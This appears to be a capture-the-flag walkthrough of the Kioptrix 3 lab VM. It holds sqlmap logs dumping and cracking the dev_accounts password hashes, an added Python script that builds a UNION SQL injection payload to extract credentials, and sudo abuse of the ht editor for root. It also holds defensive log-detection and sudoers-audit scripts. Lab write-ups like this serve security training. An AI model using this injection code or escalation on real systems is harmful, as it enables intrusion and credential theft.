Payload: id=1 UNION ALL SELECT CONCAT(0x716a767a71,0x53636269564f6f6c6b59774151557a6b697471716664654755694a584468475268497a624f554d61,0x71766a6b71),NULL,NULL,NULL,NULL,NULL-- -
---
[04:04:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[04:04:27] [INFO] fetching database names
[04:04:28] [INFO] the SQL query used returns 3 entries
[04:04:28] [INFO] retrieved: information_schema
[04:04:28] [INFO] retrieved: gallery
[04:04:28] [INFO] retrieved: mysql
available databases [3]:
[*] gallery
[*] information_schema
[*] mysql
[04:04:28] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[04:04:28] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'
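The UNION payload sqlmap reports above is worth taking apart, because the same trick extracts data without the tool. Its CONCAT() wraps the value between two hex-encoded delimiters (0x716a767a71 and 0x71766a6b71 decode to qjvzq and qvjkq) so the result can be picked out of the HTML, pads the remaining five of the six columns with NULL, and ends with "-- -" to comment out whatever the application appends. The example below is added here (my code, not sqlmap's and not from the page): it builds that payload for gallery.php?id, folds the whole dev_accounts table into one cell with GROUP_CONCAT, and parses the delimited answer out of a constructed response body. The endpoint URL is the one from the page; the response HTML is made up.

```python
import re
import urllib.parse

# Delimiters sqlmap used on this target; any random strings would do.
PREFIX = "qjvzq"
SUFFIX = "qvjkq"
COLUMNS = 6                                            # column count sqlmap found
BASE_URL = "http://kioptrix3.com/gallery/gallery.php"  # injectable endpoint on the page

# One subquery that returns the whole table as a single cell:
# rows joined by '|' (0x7c), username and hash joined by ':' (0x3a).
ACCOUNTS_EXPR = ("(SELECT GROUP_CONCAT(username,0x3a,password SEPARATOR 0x7c) "
                 "FROM gallery.dev_accounts)")


def to_hex(s):
    """MySQL hex literal; keeps quote characters out of the injected string."""
    return "0x" + s.encode().hex()


def union_payload(expr, columns=COLUMNS, position=0):
    """Value for the id parameter: NULL-padded UNION with `expr` in one column,
    wrapped in the delimiters so it can be located in the page afterwards."""
    cells = ["NULL"] * columns
    cells[position] = "CONCAT(%s,%s,%s)" % (to_hex(PREFIX), expr, to_hex(SUFFIX))
    return "1 UNION ALL SELECT %s-- -" % ",".join(cells)


def dump_url(expr=ACCOUNTS_EXPR, base=BASE_URL):
    """Full GET URL; urlencode handles the spaces and the comment sequence."""
    return base + "?" + urllib.parse.urlencode({"id": union_payload(expr)})


def extract(body):
    """Every delimited value in a response body, in page order."""
    return re.findall(re.escape(PREFIX) + r"(.*?)" + re.escape(SUFFIX), body, re.S)


def parse_accounts(blob):
    """'user:hash|user:hash' -> {user: hash}."""
    accounts = {}
    for row in blob.split("|"):
        if ":" in row:
            user, pw_hash = row.split(":", 1)
            accounts[user] = pw_hash
    return accounts


def accounts_from_response(body):
    found = extract(body)
    return parse_accounts(found[0]) if found else {}


# Constructed stand-in for what gallery.php would return for dump_url();
# the hashes are the ones the page dumped from dev_accounts.
SAMPLE_BODY = ("<html><body><div class='photo'>" + PREFIX
               + "dreg:0d3eccfb887aabd50f243b3f155c0f85"
               + "|loneferret:5badcaf789d3d1d09794d8f021f40f0e"
               + SUFFIX + "</div></body></html>")

if __name__ == "__main__":
    print(dump_url())
    print(accounts_from_response(SAMPLE_BODY))
```

The delimiter trick is what lets a UNION injection survive templating: the injected column may be rendered anywhere in the page, inside any markup, and the parser only needs the two tokens around it.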
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id --tables -D gallery
[*] starting at 04:08:55
[04:08:55] [INFO] resuming back-end DBMS 'mysql'
[04:08:55] [INFO] testing connection to the target URL
[04:08:55] [INFO] heuristics detected web page charset 'ISO-8859-2'
[04:08:55] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[04:08:55] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
(same four injection points as in the first run; omitted)
---
[04:08:55] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[04:08:55] [INFO] fetching tables for database: 'gallery'
[04:08:55] [INFO] the SQL query used returns 7 entries
[04:08:56] [INFO] retrieved: dev_accounts
[04:08:56] [INFO] retrieved: gallarific_comments
[04:08:56] [INFO] retrieved: gallarific_galleries
[04:08:56] [INFO] retrieved: gallarific_photos
[04:08:56] [INFO] retrieved: gallarific_settings
[04:08:56] [INFO] retrieved: gallarific_stats
[04:08:56] [INFO] retrieved: gallarific_users
Database: gallery
[7 tables]
+----------------------+
| dev_accounts |
| gallarific_comments |
| gallarific_galleries |
| gallarific_photos |
| gallarific_settings |
| gallarific_stats |
| gallarific_users |
+----------------------+
[04:08:56] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[04:08:56] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'
[*] shutting down at 04:08:56
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id -T dev_accounts --dump
[*] starting at 03:32:50
[03:32:50] [INFO] testing connection to the target URL
[03:32:51] [INFO] heuristics detected web page charset 'ISO-8859-2'
[03:32:51] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[03:32:51] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[03:32:51] [INFO] testing if the target URL is stable
[03:32:52] [INFO] target URL is stable
[03:32:52] [INFO] heuristics detected web page charset 'ascii'
[03:32:52] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[03:32:52] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to XSS attacks
[03:32:52] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[03:33:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[03:33:11] [WARNING] reflective value(s) found and filtering out
[03:33:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[03:33:14] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[03:33:14] [INFO] GET parameter 'id' seems to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable
[03:33:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[03:33:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
[03:33:14] [INFO] testing 'MySQL inline queries'
[03:33:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[03:33:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[03:33:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[03:33:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[03:33:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[03:33:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[03:33:14] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[03:33:24] [INFO] GET parameter 'id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
[03:33:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[03:33:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[03:33:25] [INFO] target URL appears to be UNION injectable with 6 columns
[03:33:25] [WARNING] combined UNION/error-based SQL injection case found on column 2. sqlmap will try to find another column with better characteristics
[03:33:25] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[03:33:25] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 142 HTTP(s) requests:
---
(same four injection points as listed in the first run above; omitted)
---
[03:33:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[03:33:43] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[03:33:43] [INFO] fetching current database
[03:33:43] [INFO] fetching columns for table 'dev_accounts' in database 'gallery'
[03:33:43] [INFO] the SQL query used returns 3 entries
[03:33:43] [INFO] the SQL query used returns 3 entries
[03:33:43] [INFO] retrieved: id
[03:33:43] [INFO] retrieved: int(10)
[03:33:43] [INFO] retrieved: username
[03:33:43] [INFO] retrieved: varchar(50)
[03:33:43] [INFO] retrieved: password
[03:33:43] [INFO] retrieved: varchar(50)
[03:33:43] [INFO] fetching entries for table 'dev_accounts' in database 'gallery'
[03:33:43] [INFO] the SQL query used returns 2 entries
[03:33:44] [INFO] retrieved: "1","0d3eccfb887aabd50f243b3f155c0f85","dreg"
[03:33:44] [WARNING] automatically patching output having last char trimmed
[03:33:44] [INFO] retrieved: "2","5badcaf789d3d1d09794d8f021f40f0e","loneferret"
[03:33:44] [INFO] analyzing table dump for possible password hashes
[03:33:44] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[03:33:56] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> /usr/share/wordlists/rockyou.txt.gz
[03:34:19] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[03:34:26] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[03:34:26] [INFO] starting 2 processes
[03:34:27] [INFO] cracked password 'Mast3r' for user 'dreg'
[03:34:30] [INFO] cracked password 'starwars' for user 'loneferret'
[03:34:31] [INFO] postprocessing table dump
Database: gallery
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username | password |
+----+------------+---------------------------------------------+
| 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r) |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+
[03:34:31] [INFO] table 'gallery.dev_accounts' dumped to CSV file '/root/.sqlmap/output/kioptrix3.com/dump/gallery/dev_accounts.csv'
[03:34:31] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 21 times
[03:34:31] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'
[*] shutting down at 03:34:31
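From the defender's side, the payload shapes sqlmap reported above (OR n=n#, SLEEP(), FLOOR(RAND(0)*2) against INFORMATION_SCHEMA, UNION ALL SELECT) stand out in the web server's access log. The script below is an added example, not part of the original walkthrough or the Gallarific application; the log lines are constructed and the /gallery.php path is an assumption.

```python
"""Flag sqlmap-style SQL injection attempts in Apache access logs.
Added example, not part of the original walkthrough. LOG_LINES are constructed
to mirror the payload shapes sqlmap reported for the 'id' parameter; the
script path /gallery.php is an assumption, not taken from the page."""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# One pattern per technique sqlmap reported; matched against the URL-decoded value.
PATTERNS = {
    "boolean-based": re.compile(r"\b(or|and)\s+\d+\s*=\s*\d+\s*(#|--)", re.I),
    "error-based": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)|information_schema", re.I),
    "time-based": re.compile(r"\bsleep\s*\(\s*\d+\s*\)|\bbenchmark\s*\(", re.I),
    "union-based": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
}

# Apache combined log format: client, identd, user, [timestamp], "request", status, bytes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def classify(line):
    """Return (client_ip, parameter, [techniques]) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("path")).query
    for param, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            decoded = unquote_plus(value)  # parse_qs decoded once; catch double encoding
            hits = [name for name, rx in PATTERNS.items() if rx.search(decoded)]
            if hits:
                return m.group("ip"), param, hits
    return None

def scan(lines):
    """Return one finding per suspicious log line, in input order."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample traffic (not a real capture): three probes, one normal request.
LOG_LINES = [
    '192.168.180.1 - - [15/Aug/2016:03:33:14 -0400] "GET /gallery.php?id=-9800%20OR%206056%3D6056%23 HTTP/1.1" 200 5121',
    '192.168.180.1 - - [15/Aug/2016:03:33:24 -0400] "GET /gallery.php?id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))ZmZi) HTTP/1.1" 200 5121',
    '192.168.180.1 - - [15/Aug/2016:03:33:25 -0400] "GET /gallery.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1" 500 1201',
    '192.168.180.50 - - [15/Aug/2016:03:40:01 -0400] "GET /gallery.php?id=1 HTTP/1.1" 200 5121',
]

if __name__ == "__main__":
    for ip, param, techniques in scan(LOG_LINES):
        print(f"{ip} parameter={param} techniques={','.join(techniques)}")
```

The burst of 500 responses sqlmap itself warned about at the end of the run is a second, cheaper signal worth alerting on alongside these matches.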
ssh loneferret@kioptrix3.com
loneferret@kioptrix3.com's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$
sudo su
[sudo] password for loneferret:
Sorry, user loneferret is not allowed to execute '/bin/su' as root on Kioptrix3.
export TERM=xterm
sudo ht
Shadow:
root:$1$QAKvVJey$6rRkAMGKq1u62yfDaenUr1:15082:0:99999:7:::
Edit sudoers
# User privilege specification
root ALL=(ALL) ALL
loneferret ALL=(ALL) ALL
loneferret@Kioptrix3:/usr/local/bin$ sudo ht /etc/sudoers
loneferret@Kioptrix3:/usr/local/bin$ sudo su
[sudo] password for loneferret:
root@Kioptrix3:/usr/local/bin# whoami
root
root@Kioptrix3:/usr/local/bin#
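The escalation above works because a sudo rule that permits an editor such as ht is equivalent to permitting everything: the editor can rewrite /etc/sudoers itself, and a `!/bin/su` deny in the same rule changes nothing. The audit script below is an added example, not from the original post; SUDOERS is a constructed sample, since the VM's actual rule for loneferret is not shown on the page.

```python
"""Audit sudoers rules for editor or shell grants that are root-equivalent.
Added example, not from the original walkthrough; SUDOERS is a constructed sample
modelled on the loneferret/ht situation (the VM's real rule is not shown)."""
import re

# Running one of these as root lets the caller rewrite /etc/sudoers or get a shell,
# so such a grant is as strong as 'ALL' no matter what else the rule forbids.
EDITORS = {"ht", "vi", "vim", "nano", "emacs", "ed"}
SHELLS = {"sh", "bash", "dash", "su"}
RULE_RE = re.compile(r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")

def parse_rule(line):
    """Split 'user host=(runas) [NOPASSWD:] cmd, cmd' into parts; None for non-rules."""
    line = line.split("#", 1)[0].strip()
    m = RULE_RE.match(line) if line and not line.startswith("Defaults") else None
    if not m:
        return None
    cmds = re.sub(r"(NO)?PASSWD:", "", m.group("cmds"))
    return {"who": m.group("who"), "nopasswd": "NOPASSWD:" in m.group("cmds"),
            "cmds": [c.strip() for c in cmds.split(",") if c.strip()]}

def audit(sudoers_text):
    """Return (user, command, reason) for every grant that is effectively root."""
    findings = []
    for line in sudoers_text.splitlines():
        rule = parse_rule(line)
        if not rule or rule["who"] == "root":
            continue
        for cmd in rule["cmds"]:
            if cmd.startswith("!"):
                continue  # a '!' deny does not stop an allowed editor reaching root
            prog = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                findings.append((rule["who"], cmd, "unrestricted root"))
            elif prog in EDITORS:
                findings.append((rule["who"], cmd, "editor can rewrite /etc/sudoers"))
            elif prog in SHELLS:
                findings.append((rule["who"], cmd, "spawns a root shell"))
    return findings

SUDOERS = """\
# constructed sample, not the VM's actual file
Defaults env_reset
root ALL=(ALL) ALL
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
www-data ALL=(root) /usr/sbin/service apache2 restart
"""
```

Calling `audit(SUDOERS)` reports only the loneferret/ht grant; the service restart rule for www-data is narrow enough to pass.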
root@Kioptrix3:/usr/local/bin# cd /root
root@Kioptrix3:~# ls
Congrats.txt ht-2.0.18
root@Kioptrix3:~# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.
Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intended for everyone.
Difficulty is relative, keep that in mind.
The object is to learn, do some research and have a little (legal)
fun in the process.
I hope you enjoyed this third challenge.
Steven McElrea
aka loneferret
http://www.kioptrix.com
Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.
Main page CMS:
http://www.lotuscms.org
Gallery application:
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/
The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/
Also, all pictures were taken from Google Images, so being part of the
public domain I used them.
Best Regards,
Yuriy Stanchev/URIX